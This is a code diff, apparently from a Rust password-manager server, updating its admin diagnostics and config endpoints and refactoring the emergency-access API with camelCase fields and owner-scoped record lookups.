"{year}-{month:02}-{day:02} {hour:02}:{minute:02}:{seconds:02} UTC",
|
if key == "ts" {
|
||||||
year = ntp_time.year,
|
let ts = value.split_once('.').map_or(value, |(s, _)| s);
|
||||||
month = ntp_time.month,
|
if let Ok(dt) = chrono::DateTime::parse_from_str(ts, "%s") {
|
||||||
day = ntp_time.day,
|
return dt.format("%Y-%m-%d %H:%M:%S UTC").to_string();
|
||||||
hour = ntp_time.hour,
|
}
|
||||||
minute = ntp_time.minute,
|
break;
|
||||||
seconds = ntp_time.seconds
|
}
|
||||||
);
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
String::from("Unable to fetch NTP time.")
|
String::from("Unable to fetch NTP time.")
|
||||||
@@ -668,18 +669,6 @@ async fn diagnostics(_token: AdminToken, ip_header: IpHeader, mut conn: DbConn)
|
|||||||
use chrono::prelude::*;
|
use chrono::prelude::*;
|
||||||
use std::net::ToSocketAddrs;
|
use std::net::ToSocketAddrs;
|
||||||
|
|
||||||
// Get current running versions
|
|
||||||
let web_vault_version: WebVaultVersion =
|
|
||||||
match std::fs::read_to_string(format!("{}/{}", CONFIG.web_vault_folder(), "vw-version.json")) {
|
|
||||||
Ok(s) => serde_json::from_str(&s)?,
|
|
||||||
_ => match std::fs::read_to_string(format!("{}/{}", CONFIG.web_vault_folder(), "version.json")) {
|
|
||||||
Ok(s) => serde_json::from_str(&s)?,
|
|
||||||
_ => WebVaultVersion {
|
|
||||||
version: String::from("Version file missing"),
|
|
||||||
},
|
|
||||||
},
|
|
||||||
};
|
|
||||||
|
|
||||||
// Execute some environment checks
|
// Execute some environment checks
|
||||||
let running_within_container = is_running_in_container();
|
let running_within_container = is_running_in_container();
|
||||||
let has_http_access = has_http_access().await;
|
let has_http_access = has_http_access().await;
|
||||||
@@ -694,12 +683,21 @@ async fn diagnostics(_token: AdminToken, ip_header: IpHeader, mut conn: DbConn)
|
|||||||
_ => "Unable to resolve domain name.".to_string(),
|
_ => "Unable to resolve domain name.".to_string(),
|
||||||
};
|
};
|
||||||
|
|
||||||
let (latest_release, latest_commit, latest_web_build) =
|
let (latest_release, latest_commit, latest_web_build) = get_release_info(has_http_access).await;
|
||||||
get_release_info(has_http_access, running_within_container).await;
|
|
||||||
|
|
||||||
let ip_header_name = match &ip_header.0 {
|
let ip_header_name = &ip_header.0.unwrap_or_default();
|
||||||
Some(h) => h,
|
|
||||||
_ => "",
|
// Get current running versions
|
||||||
|
let web_vault_version = get_web_vault_version();
|
||||||
|
|
||||||
|
// Check if the running version is newer than the latest stable released version
|
||||||
|
let web_vault_pre_release = if let Ok(web_ver_match) = semver::VersionReq::parse(&format!(">{latest_web_build}")) {
|
||||||
|
web_ver_match.matches(
|
||||||
|
&semver::Version::parse(&web_vault_version).unwrap_or_else(|_| semver::Version::parse("2025.1.1").unwrap()),
|
||||||
|
)
|
||||||
|
} else {
|
||||||
|
error!("Unable to parse latest_web_build: '{latest_web_build}'");
|
||||||
|
false
|
||||||
};
|
};
|
||||||
|
|
||||||
let diagnostics_json = json!({
|
let diagnostics_json = json!({
|
||||||
@@ -708,22 +706,25 @@ async fn diagnostics(_token: AdminToken, ip_header: IpHeader, mut conn: DbConn)
|
|||||||
"latest_release": latest_release,
|
"latest_release": latest_release,
|
||||||
"latest_commit": latest_commit,
|
"latest_commit": latest_commit,
|
||||||
"web_vault_enabled": &CONFIG.web_vault_enabled(),
|
"web_vault_enabled": &CONFIG.web_vault_enabled(),
|
||||||
"web_vault_version": web_vault_version.version.trim_start_matches('v'),
|
"web_vault_version": web_vault_version,
|
||||||
"latest_web_build": latest_web_build,
|
"latest_web_build": latest_web_build,
|
||||||
|
"web_vault_pre_release": web_vault_pre_release,
|
||||||
"running_within_container": running_within_container,
|
"running_within_container": running_within_container,
|
||||||
"container_base_image": if running_within_container { container_base_image() } else { "Not applicable" },
|
"container_base_image": if running_within_container { container_base_image() } else { "Not applicable" },
|
||||||
"has_http_access": has_http_access,
|
"has_http_access": has_http_access,
|
||||||
"ip_header_exists": &ip_header.0.is_some(),
|
"ip_header_exists": !ip_header_name.is_empty(),
|
||||||
"ip_header_match": ip_header_name == CONFIG.ip_header(),
|
"ip_header_match": ip_header_name.eq(&CONFIG.ip_header()),
|
||||||
"ip_header_name": ip_header_name,
|
"ip_header_name": ip_header_name,
|
||||||
"ip_header_config": &CONFIG.ip_header(),
|
"ip_header_config": &CONFIG.ip_header(),
|
||||||
"uses_proxy": uses_proxy,
|
"uses_proxy": uses_proxy,
|
||||||
|
"enable_websocket": &CONFIG.enable_websocket(),
|
||||||
"db_type": *DB_TYPE,
|
"db_type": *DB_TYPE,
|
||||||
"db_version": get_sql_server_version(&mut conn).await,
|
"db_version": get_sql_server_version(&mut conn).await,
|
||||||
"admin_url": format!("{}/diagnostics", admin_url()),
|
"admin_url": format!("{}/diagnostics", admin_url()),
|
||||||
"overrides": &CONFIG.get_overrides().join(", "),
|
"overrides": &CONFIG.get_overrides().join(", "),
|
||||||
"host_arch": std::env::consts::ARCH,
|
"host_arch": env::consts::ARCH,
|
||||||
"host_os": std::env::consts::OS,
|
"host_os": env::consts::OS,
|
||||||
|
"tz_env": env::var("TZ").unwrap_or_default(),
|
||||||
"server_time_local": Local::now().format("%Y-%m-%d %H:%M:%S %Z").to_string(),
|
"server_time_local": Local::now().format("%Y-%m-%d %H:%M:%S %Z").to_string(),
|
||||||
"server_time": Utc::now().format("%Y-%m-%d %H:%M:%S UTC").to_string(), // Run the server date/time check as late as possible to minimize the time difference
|
"server_time": Utc::now().format("%Y-%m-%d %H:%M:%S UTC").to_string(), // Run the server date/time check as late as possible to minimize the time difference
|
||||||
"ntp_time": get_ntp_time(has_http_access).await, // Run the ntp check as late as possible to minimize the time difference
|
"ntp_time": get_ntp_time(has_http_access).await, // Run the ntp check as late as possible to minimize the time difference
|
||||||
@@ -733,27 +734,41 @@ async fn diagnostics(_token: AdminToken, ip_header: IpHeader, mut conn: DbConn)
|
|||||||
Ok(Html(text))
|
Ok(Html(text))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/diagnostics/config")]
|
#[get("/diagnostics/config", format = "application/json")]
|
||||||
fn get_diagnostics_config(_token: AdminToken) -> Json<Value> {
|
fn get_diagnostics_config(_token: AdminToken) -> Json<Value> {
|
||||||
let support_json = CONFIG.get_support_json();
|
let support_json = CONFIG.get_support_json();
|
||||||
Json(support_json)
|
Json(support_json)
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/config", data = "<data>")]
|
#[get("/diagnostics/http?<code>")]
|
||||||
fn post_config(data: Json<ConfigBuilder>, _token: AdminToken) -> EmptyResult {
|
fn get_diagnostics_http(code: u16, _token: AdminToken) -> EmptyResult {
|
||||||
|
err_code!(format!("Testing error {code} response"), code);
|
||||||
|
}
|
||||||
|
|
||||||
|
#[post("/config", format = "application/json", data = "<data>")]
|
||||||
|
async fn post_config(data: Json<ConfigBuilder>, _token: AdminToken) -> EmptyResult {
|
||||||
let data: ConfigBuilder = data.into_inner();
|
let data: ConfigBuilder = data.into_inner();
|
||||||
CONFIG.update_config(data)
|
if let Err(e) = CONFIG.update_config(data, true).await {
|
||||||
|
err!(format!("Unable to save config: {e:?}"))
|
||||||
|
}
|
||||||
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/config/delete")]
|
#[post("/config/delete", format = "application/json")]
|
||||||
fn delete_config(_token: AdminToken) -> EmptyResult {
|
async fn delete_config(_token: AdminToken) -> EmptyResult {
|
||||||
CONFIG.delete_user_config()
|
if let Err(e) = CONFIG.delete_user_config().await {
|
||||||
|
err!(format!("Unable to delete config: {e:?}"))
|
||||||
|
}
|
||||||
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/config/backup_db")]
|
#[post("/config/backup_db", format = "application/json")]
|
||||||
async fn backup_db(_token: AdminToken, mut conn: DbConn) -> EmptyResult {
|
async fn backup_db(_token: AdminToken, mut conn: DbConn) -> ApiResult<String> {
|
||||||
if *CAN_BACKUP {
|
if *CAN_BACKUP {
|
||||||
backup_database(&mut conn).await
|
match backup_database(&mut conn).await {
|
||||||
|
Ok(f) => Ok(format!("Backup to '{f}' was successful")),
|
||||||
|
Err(e) => err!(format!("Backup was unsuccessful {e}")),
|
||||||
|
}
|
||||||
} else {
|
} else {
|
||||||
err!("Can't back up current DB (Only SQLite supports this feature)");
|
err!("Can't back up current DB (Only SQLite supports this feature)");
|
||||||
}
|
}
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
@@ -1,11 +1,11 @@
|
|||||||
use chrono::{Duration, Utc};
|
use chrono::{TimeDelta, Utc};
|
||||||
use rocket::{serde::json::Json, Route};
|
use rocket::{serde::json::Json, Route};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{
|
api::{
|
||||||
core::{CipherSyncData, CipherSyncType},
|
core::{CipherSyncData, CipherSyncType},
|
||||||
EmptyResult, JsonResult, JsonUpcase,
|
EmptyResult, JsonResult,
|
||||||
},
|
},
|
||||||
auth::{decode_emergency_access_invite, Headers},
|
auth::{decode_emergency_access_invite, Headers},
|
||||||
db::{models::*, DbConn, DbPool},
|
db::{models::*, DbConn, DbPool},
|
||||||
@@ -43,31 +43,33 @@ pub fn routes() -> Vec<Route> {
|
|||||||
async fn get_contacts(headers: Headers, mut conn: DbConn) -> Json<Value> {
|
async fn get_contacts(headers: Headers, mut conn: DbConn) -> Json<Value> {
|
||||||
if !CONFIG.emergency_access_allowed() {
|
if !CONFIG.emergency_access_allowed() {
|
||||||
return Json(json!({
|
return Json(json!({
|
||||||
"Data": [{
|
"data": [{
|
||||||
"Id": "",
|
"id": "",
|
||||||
"Status": 2,
|
"status": 2,
|
||||||
"Type": 0,
|
"type": 0,
|
||||||
"WaitTimeDays": 0,
|
"waitTimeDays": 0,
|
||||||
"GranteeId": "",
|
"granteeId": "",
|
||||||
"Email": "",
|
"email": "",
|
||||||
"Name": "NOTE: Emergency Access is disabled!",
|
"name": "NOTE: Emergency Access is disabled!",
|
||||||
"Object": "emergencyAccessGranteeDetails",
|
"object": "emergencyAccessGranteeDetails",
|
||||||
|
|
||||||
}],
|
}],
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": null
|
"continuationToken": null
|
||||||
}));
|
}));
|
||||||
}
|
}
|
||||||
let emergency_access_list = EmergencyAccess::find_all_by_grantor_uuid(&headers.user.uuid, &mut conn).await;
|
let emergency_access_list = EmergencyAccess::find_all_by_grantor_uuid(&headers.user.uuid, &mut conn).await;
|
||||||
let mut emergency_access_list_json = Vec::with_capacity(emergency_access_list.len());
|
let mut emergency_access_list_json = Vec::with_capacity(emergency_access_list.len());
|
||||||
for ea in emergency_access_list {
|
for ea in emergency_access_list {
|
||||||
emergency_access_list_json.push(ea.to_json_grantee_details(&mut conn).await);
|
if let Some(grantee) = ea.to_json_grantee_details(&mut conn).await {
|
||||||
|
emergency_access_list_json.push(grantee)
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
Json(json!({
|
Json(json!({
|
||||||
"Data": emergency_access_list_json,
|
"data": emergency_access_list_json,
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": null
|
"continuationToken": null
|
||||||
}))
|
}))
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -84,18 +86,20 @@ async fn get_grantees(headers: Headers, mut conn: DbConn) -> Json<Value> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
Json(json!({
|
Json(json!({
|
||||||
"Data": emergency_access_list_json,
|
"data": emergency_access_list_json,
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": null
|
"continuationToken": null
|
||||||
}))
|
}))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/emergency-access/<emer_id>")]
|
#[get("/emergency-access/<emer_id>")]
|
||||||
async fn get_emergency_access(emer_id: &str, mut conn: DbConn) -> JsonResult {
|
async fn get_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
match EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await {
|
||||||
Some(emergency_access) => Ok(Json(emergency_access.to_json_grantee_details(&mut conn).await)),
|
Some(emergency_access) => Ok(Json(
|
||||||
|
emergency_access.to_json_grantee_details(&mut conn).await.expect("Grantee user should exist but does not!"),
|
||||||
|
)),
|
||||||
None => err!("Emergency access not valid."),
|
None => err!("Emergency access not valid."),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -105,42 +109,49 @@ async fn get_emergency_access(emer_id: &str, mut conn: DbConn) -> JsonResult {
|
|||||||
// region put/post
|
// region put/post
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EmergencyAccessUpdateData {
|
struct EmergencyAccessUpdateData {
|
||||||
Type: NumberOrString,
|
r#type: NumberOrString,
|
||||||
WaitTimeDays: i32,
|
wait_time_days: i32,
|
||||||
KeyEncrypted: Option<String>,
|
key_encrypted: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/emergency-access/<emer_id>", data = "<data>")]
|
#[put("/emergency-access/<emer_id>", data = "<data>")]
|
||||||
async fn put_emergency_access(emer_id: &str, data: JsonUpcase<EmergencyAccessUpdateData>, conn: DbConn) -> JsonResult {
|
async fn put_emergency_access(
|
||||||
post_emergency_access(emer_id, data, conn).await
|
emer_id: EmergencyAccessId,
|
||||||
|
data: Json<EmergencyAccessUpdateData>,
|
||||||
|
headers: Headers,
|
||||||
|
conn: DbConn,
|
||||||
|
) -> JsonResult {
|
||||||
|
post_emergency_access(emer_id, data, headers, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>", data = "<data>")]
|
#[post("/emergency-access/<emer_id>", data = "<data>")]
|
||||||
async fn post_emergency_access(
|
async fn post_emergency_access(
|
||||||
emer_id: &str,
|
emer_id: EmergencyAccessId,
|
||||||
data: JsonUpcase<EmergencyAccessUpdateData>,
|
data: Json<EmergencyAccessUpdateData>,
|
||||||
|
headers: Headers,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let data: EmergencyAccessUpdateData = data.into_inner().data;
|
let data: EmergencyAccessUpdateData = data.into_inner();
|
||||||
|
|
||||||
let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(mut emergency_access) =
|
||||||
Some(emergency_access) => emergency_access,
|
EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
let new_type = match EmergencyAccessType::from_str(&data.Type.into_string()) {
|
let new_type = match EmergencyAccessType::from_str(&data.r#type.into_string()) {
|
||||||
Some(new_type) => new_type as i32,
|
Some(new_type) => new_type as i32,
|
||||||
None => err!("Invalid emergency access type."),
|
None => err!("Invalid emergency access type."),
|
||||||
};
|
};
|
||||||
|
|
||||||
emergency_access.atype = new_type;
|
emergency_access.atype = new_type;
|
||||||
emergency_access.wait_time_days = data.WaitTimeDays;
|
emergency_access.wait_time_days = data.wait_time_days;
|
||||||
if data.KeyEncrypted.is_some() {
|
if data.key_encrypted.is_some() {
|
||||||
emergency_access.key_encrypted = data.KeyEncrypted;
|
emergency_access.key_encrypted = data.key_encrypted;
|
||||||
}
|
}
|
||||||
|
|
||||||
emergency_access.save(&mut conn).await?;
|
emergency_access.save(&mut conn).await?;
|
||||||
@@ -152,26 +163,30 @@ async fn post_emergency_access(
|
|||||||
// region delete
|
// region delete
|
||||||
|
|
||||||
#[delete("/emergency-access/<emer_id>")]
|
#[delete("/emergency-access/<emer_id>")]
|
||||||
async fn delete_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
async fn delete_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let grantor_user = headers.user;
|
let emergency_access = match (
|
||||||
|
EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await,
|
||||||
let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &headers.user.uuid, &mut conn).await,
|
||||||
Some(emer) => {
|
) {
|
||||||
if emer.grantor_uuid != grantor_user.uuid && emer.grantee_uuid != Some(grantor_user.uuid) {
|
(Some(grantor_emer), None) => {
|
||||||
err!("Emergency access not valid.")
|
info!("Grantor deleted emergency access {emer_id}");
|
||||||
}
|
grantor_emer
|
||||||
emer
|
|
||||||
}
|
}
|
||||||
None => err!("Emergency access not valid."),
|
(None, Some(grantee_emer)) => {
|
||||||
|
info!("Grantee deleted emergency access {emer_id}");
|
||||||
|
grantee_emer
|
||||||
|
}
|
||||||
|
_ => err!("Emergency access not valid."),
|
||||||
};
|
};
|
||||||
|
|
||||||
emergency_access.delete(&mut conn).await?;
|
emergency_access.delete(&mut conn).await?;
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/delete")]
|
#[post("/emergency-access/<emer_id>/delete")]
|
||||||
async fn post_delete_emergency_access(emer_id: &str, headers: Headers, conn: DbConn) -> EmptyResult {
|
async fn post_delete_emergency_access(emer_id: EmergencyAccessId, headers: Headers, conn: DbConn) -> EmptyResult {
|
||||||
delete_emergency_access(emer_id, headers, conn).await
|
delete_emergency_access(emer_id, headers, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -180,24 +195,24 @@ async fn post_delete_emergency_access(emer_id: &str, headers: Headers, conn: DbC
|
|||||||
// region invite
|
// region invite
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EmergencyAccessInviteData {
|
struct EmergencyAccessInviteData {
|
||||||
Email: String,
|
email: String,
|
||||||
Type: NumberOrString,
|
r#type: NumberOrString,
|
||||||
WaitTimeDays: i32,
|
wait_time_days: i32,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/invite", data = "<data>")]
|
#[post("/emergency-access/invite", data = "<data>")]
|
||||||
async fn send_invite(data: JsonUpcase<EmergencyAccessInviteData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
async fn send_invite(data: Json<EmergencyAccessInviteData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let data: EmergencyAccessInviteData = data.into_inner().data;
|
let data: EmergencyAccessInviteData = data.into_inner();
|
||||||
let email = data.Email.to_lowercase();
|
let email = data.email.to_lowercase();
|
||||||
let wait_time_days = data.WaitTimeDays;
|
let wait_time_days = data.wait_time_days;
|
||||||
|
|
||||||
let emergency_access_status = EmergencyAccessStatus::Invited as i32;
|
let emergency_access_status = EmergencyAccessStatus::Invited as i32;
|
||||||
|
|
||||||
let new_type = match EmergencyAccessType::from_str(&data.Type.into_string()) {
|
let new_type = match EmergencyAccessType::from_str(&data.r#type.into_string()) {
|
||||||
Some(new_type) => new_type as i32,
|
Some(new_type) => new_type as i32,
|
||||||
None => err!("Invalid emergency access type."),
|
None => err!("Invalid emergency access type."),
|
||||||
};
|
};
|
||||||
@@ -209,10 +224,10 @@ async fn send_invite(data: JsonUpcase<EmergencyAccessInviteData>, headers: Heade
|
|||||||
err!("You can not set yourself as an emergency contact.")
|
err!("You can not set yourself as an emergency contact.")
|
||||||
}
|
}
|
||||||
|
|
||||||
let grantee_user = match User::find_by_mail(&email, &mut conn).await {
|
let (grantee_user, new_user) = match User::find_by_mail(&email, &mut conn).await {
|
||||||
None => {
|
None => {
|
||||||
if !CONFIG.invitations_allowed() {
|
if !CONFIG.invitations_allowed() {
|
||||||
err!(format!("Grantee user does not exist: {}", &email))
|
err!(format!("Grantee user does not exist: {email}"))
|
||||||
}
|
}
|
||||||
|
|
||||||
if !CONFIG.is_email_domain_allowed(&email) {
|
if !CONFIG.is_email_domain_allowed(&email) {
|
||||||
@@ -226,9 +241,10 @@ async fn send_invite(data: JsonUpcase<EmergencyAccessInviteData>, headers: Heade
|
|||||||
|
|
||||||
let mut user = User::new(email.clone());
|
let mut user = User::new(email.clone());
|
||||||
user.save(&mut conn).await?;
|
user.save(&mut conn).await?;
|
||||||
user
|
(user, true)
|
||||||
}
|
}
|
||||||
Some(user) => user,
|
Some(user) if user.password_hash.is_empty() => (user, true),
|
||||||
|
Some(user) => (user, false),
|
||||||
};
|
};
|
||||||
|
|
||||||
if EmergencyAccess::find_by_grantor_uuid_and_grantee_uuid_or_email(
|
if EmergencyAccess::find_by_grantor_uuid_and_grantee_uuid_or_email(
|
||||||
@@ -250,51 +266,40 @@ async fn send_invite(data: JsonUpcase<EmergencyAccessInviteData>, headers: Heade
|
|||||||
if CONFIG.mail_enabled() {
|
if CONFIG.mail_enabled() {
|
||||||
mail::send_emergency_access_invite(
|
mail::send_emergency_access_invite(
|
||||||
&new_emergency_access.email.expect("Grantee email does not exists"),
|
&new_emergency_access.email.expect("Grantee email does not exists"),
|
||||||
&grantee_user.uuid,
|
grantee_user.uuid,
|
||||||
&new_emergency_access.uuid,
|
new_emergency_access.uuid,
|
||||||
&grantor_user.name,
|
&grantor_user.name,
|
||||||
&grantor_user.email,
|
&grantor_user.email,
|
||||||
)
|
)
|
||||||
.await?;
|
.await?;
|
||||||
} else {
|
} else if !new_user {
|
||||||
// Automatically mark user as accepted if no email invites
|
// if mail is not enabled immediately accept the invitation for existing users
|
||||||
match User::find_by_mail(&email, &mut conn).await {
|
new_emergency_access.accept_invite(&grantee_user.uuid, &email, &mut conn).await?;
|
||||||
Some(user) => match accept_invite_process(&user.uuid, &mut new_emergency_access, &email, &mut conn).await {
|
|
||||||
Ok(v) => v,
|
|
||||||
Err(e) => err!(e.to_string()),
|
|
||||||
},
|
|
||||||
None => err!("Grantee user not found."),
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/reinvite")]
|
#[post("/emergency-access/<emer_id>/reinvite")]
|
||||||
async fn resend_invite(emer_id: &str, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
async fn resend_invite(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(mut emergency_access) =
|
||||||
Some(emer) => emer,
|
EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
if emergency_access.grantor_uuid != headers.user.uuid {
|
|
||||||
err!("Emergency access not valid.");
|
|
||||||
}
|
|
||||||
|
|
||||||
if emergency_access.status != EmergencyAccessStatus::Invited as i32 {
|
if emergency_access.status != EmergencyAccessStatus::Invited as i32 {
|
||||||
err!("The grantee user is already accepted or confirmed to the organization");
|
err!("The grantee user is already accepted or confirmed to the organization");
|
||||||
}
|
}
|
||||||
|
|
||||||
let email = match emergency_access.email.clone() {
|
let Some(email) = emergency_access.email.clone() else {
|
||||||
Some(email) => email,
|
err!("Email not valid.")
|
||||||
None => err!("Email not valid."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let grantee_user = match User::find_by_mail(&email, &mut conn).await {
|
let Some(grantee_user) = User::find_by_mail(&email, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantee user not found.")
|
||||||
None => err!("Grantee user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let grantor_user = headers.user;
|
let grantor_user = headers.user;
|
||||||
@@ -302,40 +307,40 @@ async fn resend_invite(emer_id: &str, headers: Headers, mut conn: DbConn) -> Emp
|
|||||||
if CONFIG.mail_enabled() {
|
if CONFIG.mail_enabled() {
|
||||||
mail::send_emergency_access_invite(
|
mail::send_emergency_access_invite(
|
||||||
&email,
|
&email,
|
||||||
&grantor_user.uuid,
|
grantor_user.uuid,
|
||||||
&emergency_access.uuid,
|
emergency_access.uuid,
|
||||||
&grantor_user.name,
|
&grantor_user.name,
|
||||||
&grantor_user.email,
|
&grantor_user.email,
|
||||||
)
|
)
|
||||||
.await?;
|
.await?;
|
||||||
} else {
|
} else if !grantee_user.password_hash.is_empty() {
|
||||||
if Invitation::find_by_mail(&email, &mut conn).await.is_none() {
|
// accept the invitation for existing user
|
||||||
let invitation = Invitation::new(&email);
|
emergency_access.accept_invite(&grantee_user.uuid, &email, &mut conn).await?;
|
||||||
invitation.save(&mut conn).await?;
|
} else if CONFIG.invitations_allowed() && Invitation::find_by_mail(&email, &mut conn).await.is_none() {
|
||||||
}
|
let invitation = Invitation::new(&email);
|
||||||
|
invitation.save(&mut conn).await?;
|
||||||
// Automatically mark user as accepted if no email invites
|
|
||||||
match accept_invite_process(&grantee_user.uuid, &mut emergency_access, &email, &mut conn).await {
|
|
||||||
Ok(v) => v,
|
|
||||||
Err(e) => err!(e.to_string()),
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct AcceptData {
|
struct AcceptData {
|
||||||
Token: String,
|
token: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/accept", data = "<data>")]
|
#[post("/emergency-access/<emer_id>/accept", data = "<data>")]
|
||||||
async fn accept_invite(emer_id: &str, data: JsonUpcase<AcceptData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
async fn accept_invite(
|
||||||
|
emer_id: EmergencyAccessId,
|
||||||
|
data: Json<AcceptData>,
|
||||||
|
headers: Headers,
|
||||||
|
mut conn: DbConn,
|
||||||
|
) -> EmptyResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let data: AcceptData = data.into_inner().data;
|
let data: AcceptData = data.into_inner();
|
||||||
let token = &data.Token;
|
let token = &data.token;
|
||||||
let claims = decode_emergency_access_invite(token)?;
|
let claims = decode_emergency_access_invite(token)?;
|
||||||
|
|
||||||
// This can happen if the user who received the invite used a different email to signup.
|
// This can happen if the user who received the invite used a different email to signup.
|
||||||
@@ -352,25 +357,24 @@ async fn accept_invite(emer_id: &str, data: JsonUpcase<AcceptData>, headers: Hea
|
|||||||
None => err!("Invited user not found"),
|
None => err!("Invited user not found"),
|
||||||
};
|
};
|
||||||
|
|
||||||
let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
// We need to search for the uuid in combination with the email, since we do not yet store the uuid of the grantee in the database.
|
||||||
Some(emer) => emer,
|
// The uuid of the grantee gets stored once accepted.
|
||||||
None => err!("Emergency access not valid."),
|
let Some(mut emergency_access) =
|
||||||
|
EmergencyAccess::find_by_uuid_and_grantee_email(&emer_id, &headers.user.email, &mut conn).await
|
||||||
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
// get grantor user to send Accepted email
|
// get grantor user to send Accepted email
|
||||||
let grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
|
let Some(grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantor user not found.")
|
||||||
None => err!("Grantor user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if emer_id == claims.emer_id
|
if emer_id == claims.emer_id
|
||||||
&& grantor_user.name == claims.grantor_name
|
&& grantor_user.name == claims.grantor_name
|
||||||
&& grantor_user.email == claims.grantor_email
|
&& grantor_user.email == claims.grantor_email
|
||||||
{
|
{
|
||||||
match accept_invite_process(&grantee_user.uuid, &mut emergency_access, &grantee_user.email, &mut conn).await {
|
emergency_access.accept_invite(&grantee_user.uuid, &grantee_user.email, &mut conn).await?;
|
||||||
Ok(v) => v,
|
|
||||||
Err(e) => err!(e.to_string()),
|
|
||||||
}
|
|
||||||
|
|
||||||
if CONFIG.mail_enabled() {
|
if CONFIG.mail_enabled() {
|
||||||
mail::send_emergency_access_invite_accepted(&grantor_user.email, &grantee_user.email).await?;
|
mail::send_emergency_access_invite_accepted(&grantor_user.email, &grantee_user.email).await?;
|
||||||
@@ -382,48 +386,29 @@ async fn accept_invite(emer_id: &str, data: JsonUpcase<AcceptData>, headers: Hea
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn accept_invite_process(
|
|
||||||
grantee_uuid: &str,
|
|
||||||
